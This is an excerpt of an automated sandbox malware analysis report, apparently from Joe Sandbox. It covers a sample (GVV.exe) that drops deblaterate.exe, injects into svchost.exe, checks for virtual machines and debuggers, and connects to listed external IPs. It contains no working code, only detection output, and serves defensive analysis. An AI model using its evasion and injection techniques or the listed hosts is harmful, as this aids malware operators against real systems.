          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Delayed program exit found
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040F7A7 Sleep,ExitProcess,5_2_0040F7A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040F7A7 Sleep,ExitProcess,15_2_0040F7A7
          Found API chain indicative of sandbox detection
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: C:\Users\user\Desktop\GVV.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-99472
          Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0041A748
          Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A748
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\GVV.exeAPI coverage: 3.8 %
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeAPI coverage: 4.1 %
          Source: C:\Windows\SysWOW64\svchost.exe TID: 6184Thread sleep count: 43 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0017DBBE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0014C2A2 FindFirstFileExW,0_2_0014C2A2
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001868EE FindFirstFileW,FindClose,0_2_001868EE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0018698F
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D076
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D3A9
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00189642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00189642
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0018979D
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00189B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00189B2B
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00185C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00185C97
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_004DDBBE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004AC2A2 FindFirstFileExW,4_2_004AC2A2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E68EE FindFirstFileW,FindClose,4_2_004E68EE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_004E698F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD076
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD3A9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E9642
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E979D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_004E9B2B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E5C97 FindFirstFileW,FindNextFileW,FindClose,4_2_004E5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044E879 FindFirstFileExA,5_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040783C FindFirstFileW,FindNextFileW,5_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407C97
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: Amcache.hve.9.drBinary or memory string: VMware
          Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.4119768647.0000000002E67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490908673.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490805278.0000000002E67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: wscript.exe, 0000000D.00000002.4082499964.000001E7162A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\AZR
          Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.9.drBinary or memory string: vmci.sys
          Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
          Source: wscript.exe, 0000000D.00000002.4082499964.000001E7162A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61c+'d
          Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.9.drBinary or memory string: VMware20,1
          Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018EAA2 BlockInput,0_2_0018EAA2
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00142622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00142622
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00134CE8 mov eax, dword ptr fs:[00000030h]0_2_00134CE8
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_01A83580 mov eax, dword ptr fs:[00000030h]0_2_01A83580
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_01A83520 mov eax, dword ptr fs:[00000030h]0_2_01A83520
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_01A81F00 mov eax, dword ptr fs:[00000030h]0_2_01A81F00
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00494CE8 mov eax, dword ptr fs:[00000030h]4_2_00494CE8
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_01783520 mov eax, dword ptr fs:[00000030h]4_2_01783520
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_01783580 mov eax, dword ptr fs:[00000030h]4_2_01783580
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_01781F00 mov eax, dword ptr fs:[00000030h]4_2_01781F00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004432B5 mov eax, dword ptr fs:[00000030h]5_2_004432B5
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 14_2_01573580 mov eax, dword ptr fs:[00000030h]14_2_01573580
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 14_2_01571F00 mov eax, dword ptr fs:[00000030h]14_2_01571F00
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 14_2_01573520 mov eax, dword ptr fs:[00000030h]14_2_01573520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h]15_2_004432B5
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00170B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00170B62
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00142622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00142622
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0013083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0013083F
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001309D5 SetUnhandledExceptionFilter,0_2_001309D5
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00130C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00130C21
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004A2622
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0049083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0049083F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004909D5 SetUnhandledExceptionFilter,4_2_004909D5
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00490C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00490C21
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004349F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434B47 SetUnhandledExceptionFilter,5_2_00434B47
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043BB22
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00434FDC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004349F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00434B47 SetUnhandledExceptionFilter,15_2_00434B47
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB22
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434FDC

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.94.53.100 2766Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2944008Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2873008Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_004120F7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_004120F7
